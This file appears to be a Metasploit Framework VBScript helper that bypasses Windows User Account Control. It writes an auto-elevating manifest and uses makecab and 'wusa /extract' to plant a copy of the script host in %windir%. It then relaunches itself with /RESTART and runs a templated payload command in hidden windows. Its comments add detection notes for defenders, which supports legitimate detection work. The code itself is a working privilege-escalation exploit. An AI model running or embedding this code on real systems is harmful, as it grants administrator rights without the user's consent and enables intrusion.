rapid7/metasploit-framework

data/exploits/scripthost_uac_bypass/bypass.vbs

' Windows Script Host UAC-bypass helper (technique class: ATT&CK T1548.002).
' Flow visible in this file:
'   1. First run (no /RESTART argument): Elevate writes a manifest beside the
'      script, copies the manifest and the running script host into %windir%
'      via makecab + "wusa /extract", then starts that copy with /RESTART.
'   2. Second run (/RESTART present): RunAsAdmin launches the payload command.
' Defender notes: look for makecab.exe followed by wusa.exe with "/extract:"
' spawned from wscript.exe/cscript.exe, and for a script host binary or a
' "<host>.manifest" file located directly in %windir% instead of System32.
' NOTE(review): "wusa /extract" is reportedly unsupported on Windows 10 and
' later - confirm for the builds you defend.
Option Explicit

' Shell object used for every process launch below; FileSystemObject for file I/O.
Dim oWs: Set oWs = CreateObject("WScript.Shell")
Dim oFso: Set oFso = CreateObject("Scripting.FileSystemObject")
' Application manifest text written out by Elevate as "<host>.manifest".
' It requests level="RequireAdministrator" and sets <autoElevate>true</autoElevate>;
' a manifest with both values next to a copied script host is a strong
' indicator of this technique.
Dim HOST_MANIFEST: HOST_MANIFEST = _
    "<?xml version=""1.0"" encoding=""UTF-8"" standalone=""yes""?>" & vbCrLf & _
    "<assembly xmlns=""urn:schemas-microsoft-com:asm.v1""" & vbCrLf & _
    "          xmlns:asmv3=""urn:schemas-microsoft-com:asm.v3""" & vbCrLf & _
    "          manifestVersion=""1.0"">" & vbCrLf & _
    "  <asmv3:trustInfo>" & vbCrLf & _
    "    <security>" & vbCrLf & _
    "      <requestedPrivileges>" & vbCrLf & _
    "        <requestedExecutionLevel level=""RequireAdministrator"" uiAccess=""false""/>" & vbCrLf & _
    "      </requestedPrivileges>" & vbCrLf & _
    "    </security>" & vbCrLf & _
    "  </asmv3:trustInfo>" & vbCrLf & _
    "  <asmv3:application>" & vbCrLf & _
    "    <asmv3:windowsSettings xmlns=""http://schemas.microsoft.com/SMI/2005/WindowsSettings"">" & vbCrLf & _
    "      <autoElevate>true</autoElevate>" & vbCrLf & _
    "      <dpiAware>true</dpiAware>" & vbCrLf & _
    "    </asmv3:windowsSettings>" & vbCrLf & _
    "  </asmv3:application>" & vbCrLf & _
    "</assembly>"


' Places sSource into the directory sTarget by packing it into a temporary
' cabinet with makecab and unpacking that cabinet with "wusa /extract".
'   sSource - path of the file to place.
'   sTarget - destination directory handed to wusa's /extract: option.
' Both commands run with window style 0 (hidden) and bWaitOnReturn = True, so
' the extract starts only after the cabinet exists. The temporary cabinet is
' deleted afterwards; the extracted file is left in sTarget.
' NOTE(review): the technique presumably depends on wusa.exe being able to
' write into sTarget without a consent prompt - confirm per Windows build.
' Detection: command-line logging (Sysmon Event ID 1 / Security 4688) shows
' the makecab -> wusa "/extract:" pair with a script host as parent.
Sub Copy(ByVal sSource, ByVal sTarget)
    Dim sTempFile: sTempFile = GetTempFilename()
    oWs.Run "makecab """ & sSource & """ """ & sTempFile & """", 0, True
    oWs.Run "wusa """ & sTempFile & """ /extract:" & sTarget, 0, True
    oFso.DeleteFile sTempFile
End Sub

' First-stage routine: stages a copy of the running script host plus the
' manifest in %windir% and re-launches this script through that copy.
' Artifacts left behind that this routine does not remove: the host binary
' and "<host>.manifest" in %windir%. Only the manifest written beside the
' script is deleted at the end.
Sub Elevate()
    ' Passed on as a literal string; expansion is presumably done by
    ' WshShell.Run / the launched process - TODO confirm.
    Const WINDIR = "%windir%"
    ' Directory of this script, including the trailing backslash.
    Dim sPath: sPath = Left(WScript.ScriptFullName, _
                            InStrRev(WScript.ScriptFullName, "\"))
    ' Last 11 characters of the host path, the length of "wscript.exe" and
    ' "cscript.exe".
    Dim sHost: sHost = Right(WScript.FullName, 11)
    Dim sManifest: sManifest = sPath & sHost & ".manifest"
    ' Write the manifest text beside the script so it can be packed by Copy.
    Dim oStream: Set oStream = oFso.CreateTextFile(sManifest)
    oStream.Write HOST_MANIFEST
    oStream.Close
    ' Stage the manifest and the host executable in the same directory.
    Copy sManifest, WINDIR
    Copy WScript.FullName, WINDIR
    ' Start the staged host on this same script with /RESTART, which selects
    ' the RunAsAdmin branch at the bottom of the file. No wait flag is passed.
    ' Detection: wscript.exe/cscript.exe executing from %windir% rather than
    ' System32, with "/RESTART" on its command line.
    oWs.Run WINDIR & "\" & sHost & " """ & WScript.ScriptFullName & """ /RESTART"
    oFso.DeleteFile sManifest
End Sub

' Returns a path made of the temporary folder and a generated temporary file
' name. Only the path string is built here; no file is created.
Function GetTempFilename()
    ' 2 is the GetSpecialFolder selector for the temporary folder.
    Const vbTemporaryFolder = 2
    Dim sTempFolder: sTempFolder = oFso.GetSpecialFolder(vbTemporaryFolder)
    GetTempFilename = oFso.BuildPath(sTempFolder, oFso.GetTempName())
End Function

' Second-stage routine, reached only when the script is started with /RESTART.
' NOTE(review): "COMMAND" looks like a template token that is substituted
' before the script is deployed - confirm against the code that consumes
' this file. For triage, the child process of the staged script host is the
' payload to examine.
Sub RunAsAdmin()
  oWs.Run "COMMAND"
End Sub

' Entry point: the named argument /RESTART separates the two stages.
' With it, the script is the re-launched instance and runs the payload;
' without it, this is the initial run and staging is performed.
If WScript.Arguments.Named.Exists("RESTART") Then
    RunAsAdmin
Else
    Elevate
End If